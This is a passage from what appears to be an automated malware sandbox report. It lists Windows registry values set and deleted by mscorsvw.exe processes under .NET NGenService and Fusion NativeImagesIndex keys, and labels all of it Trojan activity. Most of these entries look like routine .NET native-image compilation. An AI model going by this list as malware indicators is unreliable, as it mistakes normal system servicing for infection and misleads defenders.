[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F2 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 08 01 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F8 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "0"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F0 00 00 00 53 00 79"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "95 5F ED 75 73 12 8A C9 BE 63 05 C9 13 44 E1 9F"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 1C 01 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
"ImageList" = "01 00 00 00 00 02 00 00 00 FC 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 EE 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
The process mscorsvw.exe:2580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"ConfigMask" = "4361"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\77ccecdd\61ffc130\a\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62]
"DisplayName" = "Microsoft.PowerShell.GraphicalHost,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"ILDependencies" = "DD EC CC 77 30 C1 FF 61 0A 00 00 00 03 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index61]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\3fa824d2\11\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"MVID" = "EA F7 7E C3 AE 2E A1 73 83 BF A6 FB A9 3D 37 37"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2ffb0c52\5076361\3\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CD DD F2 03 91 47 BA 77 19 A6 C9 A9 E0 3E 4D B7"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6e35940e\3a9b43f3\4\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "97"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\3ef4663b\f\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62]
"SIG" = "7B 5D F0 E6 43 C6 6F 48 85 FF C5 61 E9 E4 D2 1B"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index61]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"DisplayName" = "Microsoft.PowerShell.GraphicalHost,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62]
"LastModTime" = "06 CF 4F F1 C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f]
The process mscorsvw.exe:3072 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8B FF A6 5D F6 AB AF F4 F8 BB BC 70 6B 64 DC F3"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:3724 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"DisplayName" = "Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35"
"Status" = "4098"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"SIG" = "3C 55 A6 91 EF 61 21 4C 93 C9 D8 16 A5 41 D7 5A"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"ConfigMask" = "4361"
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"DisplayName" = "Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"MVID" = "DC 19 F5 0C 5E 84 E7 22 34 33 CC 70 9E 7E B4 3F"
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F9"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A A5 79 1A 54 A2 21 B3 44 07 E9 36 98 DA C0 E2"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F9"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "94"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"LastModTime" = "0C 66 31 EB C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
The process mscorsvw.exe:3644 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB EA BF 2A 9C E9 35 2C 4D 7F DA 40 56 25 72 82"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
